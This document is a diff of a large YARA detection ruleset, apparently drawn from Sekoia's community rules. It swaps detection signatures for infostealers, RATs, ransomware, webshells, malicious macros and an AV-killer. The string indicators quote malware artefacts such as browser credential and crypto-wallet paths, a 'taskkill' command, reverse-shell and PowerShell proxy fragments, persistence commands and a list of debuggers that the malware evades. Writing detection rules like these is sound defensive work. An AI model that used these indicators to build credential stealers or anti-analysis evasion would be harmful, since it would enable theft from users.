+		$ = "SleepConditionVariableSRW"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Cloudatlas_Stagescalldllmainafterexec
+
+rule SEKOIA_Ransomware_Win_Blackmatter
 {
 	meta:
-		description = "Detects call to dllmain after execution of exported function"
+		description = "Detect Black matter ransomware (2021-07-23)"
 		author = "Sekoia.io"
-		id = "a24b7887-87f6-44e3-80c5-cd117e694595"
-		date = "2023-10-31"
+		id = "9b2d8ac3-b4d1-40f5-ac57-411547dcb2cf"
+		date = "2021-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_stagescalldllmainafterexec.yar#L1-L46"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_blackmatter.yar#L4-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6d1c1717b4012e72b0069068158265dfd215cd7685a5489aba3de4a9024bfa28"
+		logic_hash = "5a407a9901314211e13bef30254f1d129cf3c731ea970abff8602f1ae40177cb"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$chunk_1 = {
-        55
-        8B EC
-        83 EC 10
-        C7 45 ?? 00 00 00 00
-        83 7D ?? 00
-        74 ??
-        8B 45 ??
-        89 45 ??
-        8B 4D ??
-        8B 51 ??
-        03 55 ??
-        89 55 ??
-        8B 45 ??
-        8B 48 ??
-        03 4D ??
-        89 4D ??
-        6A 00
-        6A 00
-        FF 75 ??
-        FF 55 ??
-        68 00 80 00 00
-        6A 00
-        8B 55 ??
-        52
-        FF 15 ?? ?? ?? ??
-        C7 45 ?? 01 00 00 00
-        8B 45 ??
-        8B E5
-        5D
-        C2 04 00
-        }
-
 	condition:
-		any of them
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5e89d335de2021a2c268acf00ec513e5" )
 }
-rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
+rule SEKOIA_Tool_Ehole : FILE
 {
 	meta:
-		description = "Finds Daolpu Stealer samples based on specific strings."
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "dde1cf12-48d8-45b6-b453-b7196e6b1271"
-		date = "2024-07-23"
+		id = "7d30ffd0-fada-4ef4-98c3-5572a4e1e140"
+		date = "2023-06-23"
 		modified = "2024-12-19"
-		reference = "https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_daolpu_str.yar#L1-L26"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ehole.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9372a88efcdca6ca57f354fb31569522e5458271cc51dfedf09c6178a47a5b67"
+		logic_hash = "df937417b2f8e12f80fbe2edaa0863de6ed7862c117dff2a21255cb7d1d9ad3d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243985,208 +243821,177 @@ rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Content-Type: %s%s%s" ascii
-		$str02 = "Content-Disposition: %s%s%s%s%s%s%s" ascii
-		$str03 = "\\CocCoc\\Browser\\User Data\\Local State" ascii
-		$str04 = "\\Microsoft\\Edge\\User Data\\Default\\Login Data" ascii
-		$str05 = "\\Mozilla\\Firefox\\Profiles" ascii
-		$str06 = "No MAC Address Found" ascii
-		$str07 = "C:\\Windows\\Temp\\" ascii
-		$str08 = "C:\\Windows\\Temp\\result.txt" ascii
-		$str09 = "Privatekey@2211#$" ascii
-		$str10 = "CryptStringToBinaryA Failed to convert BASE64 private key." ascii
-		$str11 = "taskkill /F /IM chrome.exe" ascii
+		$s1 = "main.http400"
+		$s2 = "main.fofa_c"
+		$s3 = "main.Jsjump"
+		$s4 = "main.StandBase64"
+		$s5 = "main.fofa_http"
+		$s6 = "main.fofa_seach"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 11MB and all of them
 }
 
-rule SEKOIA_Implant_Win_Magicrat : FILE
+rule SEKOIA_Reverseshell_Win_1St_Troy : FILE
 {
 	meta:
-		description = "Detect Lazarus' MagicRAT"
+		description = "Detect the 1st Troy Reverse Shell agent used by Andariel"
 		author = "Sekoia.io"
-		id = "74973682-b214-48ee-98c3-f4b6bef76587"
-		date = "2022-09-13"
+		id = "b40b742d-8b1e-4d99-8df5-6cb8c9a7d8bd"
+		date = "2023-09-04"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_magicrat.yar#L4-L24"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/reverseshell_win_1st_troy.yar#L4-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9abc223c5ae9300b06b9161cbd9f5a501b6aaf46970b0bb74d98168792b7e659"
+		logic_hash = "a85a6ef0fe3b3fde3cb833579f4fd69cd159737888ae41e69e40a6bdc1172d1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "9dc04153455d054d7e04d46bcd8c13dd1ca16ab2995e518ba9bf33b43008d592"
-		hash2 = "c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f"
-		hash3 = "f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332"
+		hash1 = "186a6663eb91999b3e2637898ab40034f5fcd451150c9199d9b49328e64f90b5"
+		hash2 = "5b015e69629de37507e96ce258c27479d157714121d7c622698c6d1d6b547425"
+
+	strings:
+		$s1 = "1th Troy/02___Go/Reverse_Base64_Pipe"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "39dfb9f035cba21ffd90973904f90469" and pe.sections [ i ] . name == ".qtmetad" )
+		uint16be( 0 ) == 0x4d5a and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "657d7495796c36297ec1c13aaedf1dd3" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "debd992f27402355766cf3b5b47abe94" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "687d2535086bd055af5716760a2d87ce" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "78389349844e8d2d719603fc389779bf" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "44563b597e806af8a9ebe026c9ea6a53" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5db8685a067d106fe66292b828a2161c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1268012f292e60785825726967a4e63e" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c7b760c8b603f39a5ff9867accbad427" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d28526f9543ecf429de4a863b8901575" )
 }
-
-rule SEKOIA_Rat_Win_Ninerat
+rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
 {
 	meta:
-		description = "Detect the NineRAT payload"
+		description = "Detects PingPull Linux variant"
 		author = "Sekoia.io"
-		id = "a9f4f78b-5b86-4ac1-9b9b-ba2672b938bf"
-		date = "2023-12-12"
+		id = "ee213206-d9ad-47fa-bea1-61a9d2cfba58"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_ninerat.yar#L4-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_granitetyphoon_pingpulllinux_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bbb695444a6ec0d6049d0ce233ca37de6f78393e5ceb5d454867c8b554269684"
+		logic_hash = "89c89bb24d1996c04fba0e6ebfd2aaf1544d8a9e6333b896c1855747fb979308"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30"
-		hash2 = "82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def"
 
 	strings:
-		$ = "https://api.telegram.org/bot"
-		$ = "/getMe"
-		$ = "/upgrade"
-		$ = "/getFile"
-		$ = "/sendMessage"
-		$ = ">> Request send time:"
+		$ = "chkconfig --add %s"
+		$ = "chkconfig %s on"
+		$ = "update-rc.d %s enable"
+		$ = "service %s start"
+		$ = "respawn limit 10 10"
+		$ = "POST /%s HTTP/1.1"
+		$ = "PROJECT_%s_%s_%08X"
+		$ = "Description=The HTTP(S) Client"
+		$ = "exec %s -f"
 
 	condition:
-		all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3ce78c89e2c0e795ad3382aa12e99683" )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 11MB and 7 of them
 }
-rule SEKOIA_Infostealer_Win_Aurora : FILE
+rule SEKOIA_Apt_Sidecopy_Malicious_Macro : FILE
 {
 	meta:
-		description = "Finds Aurora samples based on characteristic strings"
+		description = "Detects malicious macro used by SideCopy"
 		author = "Sekoia.io"
-		id = "22ae81b4-647f-4b46-9b2a-dd96e0615d65"
-		date = "2022-11-15"
+		id = "4b90c33e-48d4-48b6-87a7-c35686e7e913"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_aurora.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_malicious_macro.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e88cbb012ffb65aa8a70b76163a834c0bc4615b0effc93945c6d915e33c04549"
+		logic_hash = "b1d9d7af8507b478b2a8d34a4a5ca3714b219a42d5b3f9d5026d98351294e1cf"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "I'm a teapot" ascii
-		$str01 = "wmic cpu get name" ascii
-		$str02 = "wmic path win32_VideoController get" ascii
-		$str03 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
-		$str04 = "Exodus\\exodus.wallet" ascii
-		$str05 = "PaliWallet" ascii
-		$str06 = "cookies.sqlite" ascii
-		$str07 = "Startup\\Documents\\User Data" ascii
-		$str08 = "atomic\\Local Storage\\leveldb" ascii
-		$str09 = "com.liberty.jaxx\\IndexedDB" ascii
-		$str10 = "Guarda\\Local Storage\\leveldb" ascii
-		$str11 = "AppData\\Roaming\\Telegram Desktop\\tdata" ascii
-		$str12 = "Ethereum\\keystore" ascii
-		$str13 = "Coin98" ascii
-		$str14 = ".bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.xml.zip" ascii
-		$str15 = "type..eq.main.Grabber" ascii
-		$str16 = "type..eq.main.Loader_A" ascii
-		$str17 = "type..eq.net/http.socksUsernamePassword" ascii
-		$str18 = "powershell" ascii
-		$str19 = "start-process" ascii
-		$str20 = "http/httpproxy" ascii
+		$ = "htmlFile$"
+		$ = "Gecko/20100101 Firefox/91.0"
+		$ = "Start Menu\\Programs\\Startup\\"
+		$ = "Document_Close"
+		$ = "ThisDocument" wide
+		$ = "ServerXMLHTTP.6.0"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 15 of them and filesize > 4MB
+		uint32be( 0 ) == 0xD0CF11E0 and all of them
 }
-rule SEKOIA_Apt_Muddywater_Powershell_Reverse_Secure_Proxy
+rule SEKOIA_Spyware_And_Fastfire : FILE
 {
 	meta:
-		description = "Detects PowerShell Reverse Secure Proxy"
+		description = "Detect the FastFire malware"
 		author = "Sekoia.io"
-		id = "b255f327-cb56-41b7-82f7-83ee23f791a5"
-		date = "2023-11-14"
+		id = "93c0ffd5-faa5-4ead-8848-1c44b459dc29"
+		date = "2022-11-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powershell_reverse_secure_proxy.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_fastfire.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6507bc030d60af5559492bbb02bc619646306ab06c9bd9d3f78ae6ce55307bda"
+		logic_hash = "2600fc0a8fc6279936decf80256be1fc8cb581a59ef6646fe48b5885e104365e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$CS.Read($buff,4,2) | Out-Null" ascii wide
-		$ = "$DP = $buff[2]*256 + $buff[3]" ascii wide
-		$ = "$PS3.BeginInvoke() | Out-Null" ascii wide
+		$funct1 = {22 00 87 18 70 20 f3 ae 40 00 6e 10 f4 ae 00 00 0c 04 1f 04 16 19 13 00 28 23 6e 20 e3 ae 04 00 12 10 6e 20 e5 ae 04 00 1a 00 25 19 6e 20 ea ae 04 00 28 05 0d 00 6e 10 ef ae 00 00 6e 10 da ae 04 00 6e 10 e1 ae 04 00 0a 00 13 01 c8 00 32 10 20 00 1c 00 ea 17 6e 10 73 ad 00 00 0c 00 22 01 60 18 70 10 5d ae 01 00 1a 02 ff 50 6e 20 69 ae 21 00 6e 10 e1 ae 04 00 0a 04 6e 20 64 ae 41 00 6e 10 72 ae 01 00 0c 04 71 20 1d 09 40 00}
+		$funct2 = {22 00 77 00 1a 01 88 56 70 20 f1 02 10 00 15 01 00 10 6e 20 f4 02 10 00 1a 01 80 8d 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 25 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 56 61 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 23 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 55 66 6e 20 32 ae 13 00 0a 03 38 03 0b 00 1a 03 24 76 71 10 b3 06 03 00 0c 03 6e 20 22 03 30 00 13 03 64 00 15 01 00 08 71 40 07 02 32 10 0c 03 11 03}
+		$s0 = "TokenResult{token="
+		$s1 = "[-] Send Resp Code ="
+		$s2 = "/report_token/report_token.php?token="
+		$s3 = "naver"
+		$s4 = "daum"
+		$s5 = "facebook"
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x6465780A and ( 1 of ( $funct* ) or all of ( $s* ) )
 }
-rule SEKOIA_Apt_Mustangpanda_Tonedrop : FILE
+rule SEKOIA_Backdoor_Win_Foresttiger : FILE
 {
 	meta:
-		description = "TONEDROP strings"
+		description = "Detect Lazarus' malware ForestTiger"
 		author = "Sekoia.io"
-		id = "39df631c-5766-4804-838f-6c9b800c0cc9"
-		date = "2023-06-19"
+		id = "d3128da2-a86d-4db8-9b75-2f3048831c7e"
+		date = "2023-10-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_tonedrop.yar#L1-L43"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_foresttiger.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "97f9138810fbc56fa1cab671865b3234f63fcd0f9a15ba012dfe76e86c6dbd48"
+		logic_hash = "401adaad1597c017c976c5b0b8f67851469c95758779b7691ebb037d0dda9f38"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e06f29dccfe90ae80812c2357171b5c48fba189ae103d28e972067b107e58795"
+		hash2 = "0be1908566efb9d23a98797884f2827de040e4cedb642b60ed66e208715ed4aa"
 
 	strings:
-		$window1 = "PROCMON_WINDOW_CLASS" ascii wide
-		$window2 = "OLLYDBG" ascii wide
-		$window3 = "WinDbgFrameClass" ascii wide
-		$window4 = "OllyDbg - [CPU]" ascii wide
-		$window5 = "Immunity Debugger - [CPU]" ascii wide
-		$errormsg1 = "Unable to open file %s for writing" ascii wide
-		$proc_01 = "cheatengine-x86_64.exe" ascii wide
-		$proc_02 = "ollydbg.exe" ascii wide
-		$proc_03 = "ida.exe" ascii wide
-		$proc_04 = "ida64.exe" ascii wide
-		$proc_05 = "radare2.exe" ascii wide
-		$proc_06 = "x64dbg.exe" ascii wide
-		$proc_07 = "procmon.exe" ascii wide
-		$proc_08 = "procmon64.exe" ascii wide
-		$proc_09 = "procexp.exe" ascii wide
-		$proc_10 = "processhacker.exe" ascii wide
-		$proc_11 = "pestudio.exe" ascii wide
-		$proc_12 = "systracerx32.exe" ascii wide
-		$proc_13 = "fiddler.exe" ascii wide
-		$proc_14 = "tcpview.exe" ascii wide
-		$opcodes_check_PEsize = {C7 85 94 FD FF FF 2C 02}
-		$opcodes_ShellExecute_1 = {C7 45 BC 53 68 65 6C}
-		$opcodes_ShellExecute_2 = {C7 45 C0 6C 45 78 65}
-		$opcodes_ShellExecute_3 = {C7 45 C4 63 75 74 65}
-		$opcodes_ShellExecute_4 = {66 C7 45 C8 41 00}
+		$ = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42"
+		$ = "biwbih="
+		$ = "rlzbiw="
+		$ = "whoami EnDePriv Erro" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and 3 of ( $window* ) and $errormsg1 and 10 of ( $proc_* ) and 3 of ( $opcodes* )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Hacktool_Win_Uknowseckeylogger : FILE
+rule SEKOIA_Apt_Lazarus_Backdoored_Jslib : FILE
 {
 	meta:
-		description = "Detect the uknowsec keylogger based on strings"
+		description = "Detects InvisibleFerret based on common ressource."
 		author = "Sekoia.io"
-		id = "ab08136d-b1f3-4e64-b73c-e6344b610f91"
-		date = "2022-10-05"
+		id = "73ffd449-93c8-494e-9c14-2e933b21a200"
+		date = "2024-10-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_uknowseckeylogger.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_backdoored_jslib.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "83a731a5b1853edcce963d458fc170206086305f3e43403c930c9633918e8ff1"
+		hash = "52e92be527690f4e63608cbc699e2f70"
+		logic_hash = "205ad321afcb22ae2bf6cf2a58ce970ea9b0edda7fab60ddeda5ea36ecfe3cb9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244194,28 +243999,24 @@ rule SEKOIA_Hacktool_Win_Uknowseckeylogger : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "github.com/atotto/clipboard" ascii
-		$str1 = "github.com/TheTitanrain/w32" ascii
-		$str2 = "github.com/aliyun/aliyun-oss-go-sdk" ascii
-		$str3 = "golang.org/x/sys" ascii
-		$str4 = "golang.org/x/time" ascii
-		$str5 = "WSARecvWSASend[Print][Right][Shift][Sleep][debug][error]" ascii
+		$obf = "(function(_0x" ascii
+		$exp = "module.exports =" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		$exp in ( filesize -500 .. filesize ) and #obf == 1
 }
-rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
 {
 	meta:
-		description = "Matches the Gamaredon Stealer obfuscation"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "a6197d16-8ed1-410b-8814-d7eff9a8096c"
-		date = "2022-02-04"
+		id = "b8327436-3f3d-441c-86b7-35cd30144dc2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_stealer_obfuscation_1.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_4.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7f6a5f8af73c4eb7debbadfd22232ad4e3f44e3aae36c3d624ce7a1a050e8782"
+		logic_hash = "ee67eb7b51ff6f3882c6b3ad86c3581396ba02f616c29a0190d0a2ad3d2ea614"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244223,107 +244024,141 @@ rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 76 61 72 20 [5-30] 3d 20 6e 65 77 20 6f 62 6a 65 63 74 5b 5d 20 7b 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 20 7d 3b }
-		$s2 = { 66 6f 72 28 69 6e 74 20 [5-30] 20 3d 20 30 3b 20 [5-30] 20 3c 20 31 30 3b 20 [5-30] 2b 2b 29 }
+		$ = "Function RC4(byteMessage, strKey)"
+		$ = "Set EL = DM.createElement("
+		$ = "decodeBase64 = EL.NodeTypedValue"
+		$ = "Execute plain"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100MB and ( #s1 > 100 or #s2 > 100 )
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Backdoor_Lin_Bifrost : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
 {
 	meta:
-		description = "Detect the Bifrost backdor based on strings"
+		description = "Detects the core of the VBS Gamaredon's Telegram Downloader"
 		author = "Sekoia.io"
-		id = "9726b5f5-8cc3-4fad-950b-f20cac04d496"
-		date = "2024-03-05"
+		id = "c934b95d-d81d-4f58-a752-1bb31ba8593d"
+		date = "2023-01-25"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_bifrost.yar#L1-L20"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a3fd671c02c29f67cf5b8d2d0e857336da72f989688f2db19cd028398080c5e2"
+		logic_hash = "940635313b23e29ac98310fc0f20352405c96190d56cd36ef028bf4d6e77fa6b"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "8e85cb6f2215999dc6823ea3982ff4376c2cbea53286e95ed00250a4a2fe4729"
-		hash2 = "2aeb70f72e87a1957e3bc478e1982fe608429cad4580737abe58f6d78a626c05"
-		hash3 = "f2bef6bed27f4b527118dd62b4035003c14afaffa72729c8117f213623f644ec"
 
 	strings:
-		$ = "%c2%s%c3%u%c4%u-%.2u-%.2u %.2u:%.2u"
-		$ = "%c1%s%c3D%c4%u-%.2u-%.2u %.2u:%.2u"
+		$a1 = "==([0-9\\@]+)==" ascii
+		$a2 = "data\"\":\"\"(.*?)" ascii
+		$a3 = ", vbcr ,\"\")" ascii
+		$a4 = ", vblf ,\"\")" ascii
+		$a5 = ", \"&&\" ,\"\")" ascii
+		$a6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" ascii
+		$b1 = "==([0-9\\@]+)==" base64
+		$b2 = "data\"\":\"\"(.*?)" base64
+		$b3 = ", vbcr ,\"\")" base64
+		$b4 = ", vblf ,\"\")" base64
+		$b5 = ", \"&&\" ,\"\")" base64
+		$b6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" base64
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and all of them
+		(4 of ( $a* ) or 4 of ( $b* ) ) and filesize < 50KB
 }
-rule SEKOIA_Apt_Unk_Hrserv_Webshell_Strings : FILE
+rule SEKOIA_Truesightkiller_Avkiller_Strings : FILE
 {
 	meta:
-		description = "Detects HrServ web shell based on strings"
+		description = "TrueSightKiller based on string"
 		author = "Sekoia.io"
-		id = "684fd41c-9ea6-4f4e-8db4-82325a2ff80b"
-		date = "2023-11-23"
+		id = "8f249ac4-5181-4169-9eb2-7d73ec4fd68d"
+		date = "2024-10-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_hrserv_webshell_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/truesightkiller_avkiller_strings.yar#L1-L45"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b5650e08227bbdb82c635bd67abae57e3107be9126639619809bfbe2a7ffee89"
+		hash = "891202963430a4b1dea2dc5b9af01dc5"
+		hash = "367af202029bf51fc347a8f414fa2a5c"
+		hash = "64439836d69084b129c2dc4264176149"
+		hash = "6e69b890b1c228fa4225776b185b5af7"
+		hash = "daaf7bdf1e7fd882c0bfb89450ec0ab2"
+		hash = "dcf36765ed9386c169eb2695d26f6a6f"
+		logic_hash = "829d144023569f332a27b7f2344d2da7be59ae5044a13c299c5da50d896288ed"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open file error!"
-		$ = "create file error!"
-		$ = "[!] CreatePipe failed."
-		$ = "[!] CreateProcess failed."
-		$ = "[!] CreateProcess success,no result return."
-		$ = "; cadataIV="
-		$ = "cadataKey="
+		$ = "[+] Process PID: " wide
+		$ = "[-] OpenSCManager failed" wide
+		$ = "[+] Creating service: truesight" wide
+		$ = "[+] Full path: " wide
+		$ = "[-] Error getting current directory." wide
+		$ = "[-] CreateService failed" wide
+		$ = "[!] Service is already running" wide
+		$ = "[-] QueryServiceStatus failed" wide
+		$ = "[-] StartService failed" wide
+		$ = "[+] Driver loaded successfully!" wide
+		$ = "[-] OpenService failed" wide
+		$ = "[-] ControlService failed" wide
+		$ = "[-] DeleteService failed" wide
